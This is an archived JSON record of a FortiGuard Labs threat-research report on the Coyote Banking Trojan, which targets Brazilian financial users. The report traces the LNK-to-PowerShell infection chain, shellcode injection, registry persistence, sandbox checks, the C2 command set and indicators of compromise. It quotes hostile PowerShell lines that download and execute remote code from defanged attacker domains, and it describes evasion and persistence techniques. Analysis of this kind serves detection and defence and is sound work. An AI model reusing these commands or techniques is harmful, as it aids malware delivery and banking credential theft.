{
	"id": "bdac6d7b-2e52-4766-b448-e773ac54c8e6",
	"created_at": "2026-04-06T00:09:56.581642Z",
	"updated_at": "2026-04-10T03:22:08.577534Z",
	"deleted_at": null,
	"sha1_hash": "898cebf5fd29f7b7846441d66a5bdd33a7014ab1",
	"title": "Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7535881,
	"plain_text": "Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard\r\nLabs\r\nBy Cara Lin\r\nPublished: 2025-01-30 · Archived: 2026-04-05 19:49:25 UTC\r\nAffected Platforms: Microsoft Windows\r\nImpacted Users: Microsoft Windows\r\nImpact: Controls victim’s device and collects sensitive information\r\nSeverity Level: High\r\nOver the past month, FortiGuard Labs has identified several similar LNK files containing PowerShell commands designed\r\nto execute malicious scripts and connect to remote servers. These files are part of multi-stage operations that ultimately\r\ndeliver the Coyote Banking Trojan. This malware primarily targets users in Brazil, seeking to harvest sensitive information\r\nfrom over 70 financial applications and numerous websites. Once deployed, the Coyote Banking Trojan can carry out\r\nvarious malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive\r\ncredentials. In this article, we will detail the behavior of each stage.\r\nFigure 1: Telemetry\r\nLNK File\r\nThe LNK file executes the following PowerShell command, which connects to a remote server to initiate the next stage: -w\r\nhid -noni -ep Bypass -c “Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri\r\n‘hxxps://tbet[.]geontrigame[.]com/zxchzzmism’ -UseBasicParsing).Content }; Start-Sleep 131.”\r\nFigure 2: LNK file\r\nWe analyzed multiple malicious files by examining the “Machine ID” embedded within the LNK files. This unique identifier\r\nprovides critical insights into the system where the LNK file originated. 
By extracting and analyzing this metadata, we\r\nhttps://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files\r\nPage 1 of 11\n\ntraced connections to other malicious LNK files associated with Coyote.\r\n \r\nURLs in Arguments Machine ID MAC Address\r\nhxxps://tbet.geontrigame[.]com/zxchzzmism 0cb44b707681 aa:1c:b2:83:1d:72\r\nhxxps://hrod.geontrigame[.]com/edsfluzevj a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://easi.geontrigame[.]com/wydqfchssb a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://iivi.geontrigame[.]com/zkrghotqvy a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://cuzo.geontrigame[.]com/pxylqhpuiv a8025a01fc56 f5:12:59:16:ba:f7\r\nhxxps://btee.geontrigame[.]com/mvkrouhawm dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://qmnw.daowsistem[.]com/fayikyeund dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://bhju.daowsistem[.]com/iwywybzqxk dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://lgfd.daowsistem[.]com/riqojhyvnr dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://leme.daowsistem[.]com/omzowcicwp dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://igow.scortma[.]com/fqieghffbm dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://quit.scortma[.]com/xzcpnnfhxi dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://llue.geontrigame[.]com/byyyfydxyf dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://cxmp.scortma[.]com/qfutdbtqqu dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://xrxw.scortma[.]com/gmdroacyvi dc0bfa46899d e8:a5:d6:6a:57:02\r\nhxxps://qfab.geontrigame[.]com/vfofnzihsm dc0bfa46899d e8:a5:d6:6a:57:02\r\nThe content in “zxchzzmism” is an additional PowerShell script that holds two encoded data segments. 
This script employs\r\nspecific commands to decode and execute the embedded shellcode, initiating the next phase of the malicious operation.\r\nFigure 3: PowerShell script\r\nLoader and Shellcode\r\nThe “bmwiMcDec” DLL file functions as a loader, utilizing VirtualAllocEx and WriteProcessMemory to inject the\r\n“npuGDec” payload. It then employs CreateRemoteThread to execute the injected malicious code, facilitating the\r\ncontinuation of the attack.\r\nFigure 4: MSIL loader\r\nThe injected code leverages Donut, a tool designed to decrypt and execute the final MSIL (Microsoft Intermediate\r\nLanguage) payloads. This ensures seamless delivery and execution of the attack’s next stage.\r\nFigure 5: Decrypt and get the MSIL file\r\nThe decrypted MSIL executable first establishes persistence by modifying the registry at\r\n“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.” It checks for any existing PowerShell command in this registry\r\nkey. If found, it removes the existing entry and creates a new one with a randomly generated name. This new registry entry\r\ncontains a customized PowerShell command that decodes a Base64-encoded URL and then downloads and executes the content it\r\npoints to, which delivers the main functions of the Coyote Banking Trojan. The targeted URL for this operation is\r\n“hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw.”\r\nFigure 6: Registry's setting\r\nIf the victim is a new target, it gathers basic system information, such as the machine name, username, and operating\r\nsystem, and sends it to a remote server. It also identifies installed antivirus products by querying the SecurityCenter2\r\nnamespace in Windows Management Instrumentation (WMI). 
The collected data is then concatenated with a “|” separator,\r\nencoded in Base64, and the resulting string is reversed. This processed string is appended as a parameter and sent back to the\r\nremote server as follows: “hxxps://yezh[.]geontrigame[.]com/hqizjs/?\r\nl=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzlmcoNEf0IDR0Ul(omit).”\r\nFigure 7: Send system's information\r\nAfter persistence is set and the check-in completes, it calls “CreateProcess” to execute the PowerShell command that was added to the registry\r\nto invoke the payload:\r\n \r\npowershell -w hid -noni -ep Bypass -c “$w=New-Object Net.WebClient;$u=\r\n[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly95ZXpoLmdlb250cmlnYW1lLmNvbS92eGV3aGNhY2JmcW\r\n$w.DownloadString($u).”\r\nCoyote Banking Trojan\r\nThe payload “vxewhcacbfqnsw” is similar to the one downloaded from the LNK file but is noticeably larger. This increase\r\nin size is due to the inclusion of the main Coyote Banking Trojan.\r\nFigure 8: PowerShell script\r\nWe obtained the MSIL file after decrypting the payload from the Donut shellcode. It contained the following functions:\r\nUsername Checking: It examines the username to see if any of the following test/sandbox names are present:\r\nJohnson, Miller, malware, maltest, CurrentUser, Sandbox, virus, John Doe, test user, sand box,\r\nWDAGUtilityAccount, Bruno, George, and Harry Johnson.\r\nVirtual Management Tool Checking: It examines whether the environment contains files or folders related to virtual\r\nmachines. 
It checks the directory “C:\\Windows\\System32” for file names such as qemu-ga, qemuwmi, balloon.sys,\r\nnetkvm.sys, vioinput, viofs.sys, and vioser.sys.\r\nBuild Target List: In this version, Coyote expands its target list to include 1,030 sites and 73 financial agents,\r\nincluding mercadobitcoin.com.br, bitcointrade.com.br, foxbit.com.br, augustoshotel.com.br,\r\nblumenhotelboutique.com.br, and fallshotel.com.br. It then starts monitoring the active window.\r\nFigure 9: Build a target list\r\nFigure 10: Connect to server\r\nCommunicate with C2: Coyote continuously monitors the active window to detect whether the victim attempts to access\r\nany target site. If a target site is accessed, it contacts the C2 server via port 443. The server list includes\r\ngeraatualiza[.]com, masterdow[.]com, and geraupdate[.]com. 
Coyote reads a message from the remote server,\r\ndecodes and cleans the data, and then dispatches to one of the following actions based on the length of the first\r\nstring in the message.\r\nLength Description\r\n10 Disconnect from server\r\n11 Terminate program\r\n12 Take screenshot as image/jpeg\r\n13 Get a window's title bar text\r\n14 Activate a window and restore it to its original size\r\n15 Minimize a window\r\n16 Activate a window and restore it to its normal size, then display it as a maximized window\r\n17 Kill targeted process\r\n18 Show full-screen overlay\r\n19 Restore a window and then maximize it\r\n20 Remove the window handle\r\n21 Shut down the device\r\n22 Enable the Desktop Window Manager composition feature, then shut down the device\r\n23 Click mouse at a specific screen position\r\n24 Copy a string to the clipboard and then simulate typing that string\r\n25 Send the specified keys to the active application. If a key contains a ‘+’, it is sent as an uppercase character; otherwise, it is sent as a lowercase character.\r\n26 Disable DWM composition\r\n27 Display the fake image for a specific target with a message. For example: “Trabalhando nas atualiza” (Working on updates), “Aponte a câmera para a imagem a seguir” (Point the camera at the following image)\r\n28 Cleanup, unhook, and stop current monitoring\r\n29 Control user-visible windows, close the window\r\n30 Adjust the opacity\r\n31 Enable keylogger or send the keylogger’s result with separator ‘¾’\r\n32 N/A\r\n33 Simulate key presses to perform automated navigation actions: {UP}, {RIGHT}, {DOWN}, and {LEFT}\r\n34 Manipulate display settings\r\n35 Send the given keys\r\nConclusion\r\nCoyote's infection process is complex and multi-staged. 
This attack leveraged an LNK file for initial access, which\r\nsubsequently led to the discovery of other malicious files. This Trojan poses a significant threat to financial cybersecurity,\r\nparticularly because it has the potential to expand beyond its initial targets. Consequently, it highlights the critical need for\r\nrobust security measures for both individuals and institutions to safeguard against evolving cyber threats.\r\nFigure 11: Attack chain\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nLNK/Agent.D!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine\r\nis part of each of these solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nThe FortiGuard Web Filtering Service blocks the C2 server.\r\nWe also suggest that organizations go through Fortinet’s free cybersecurity training module: Fortinet Certified Fundamentals\r\n(FCF) in Cybersecurity. 
This module is designed to help end users learn how to identify and protect themselves from\r\nphishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard\r\nIncident Response Team.\r\nIOCs\r\nURLs\r\nHosts\r\ngeraatualiza[.]com\r\nmasterdow[.]com\r\ngeraupdate[.]com\r\nFiles\r\nSource: 
https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/coyote-banking-trojan-a-stealthy-attack-via-lnk-files"
	],
	"report_names": [
		"coyote-banking-trojan-a-stealthy-attack-via-lnk-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434196,
	"ts_updated_at": 1775791328,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/898cebf5fd29f7b7846441d66a5bdd33a7014ab1.pdf",
		"text": "https://archive.orkl.eu/898cebf5fd29f7b7846441d66a5bdd33a7014ab1.txt",
		"img": "https://archive.orkl.eu/898cebf5fd29f7b7846441d66a5bdd33a7014ab1.jpg"
	}
}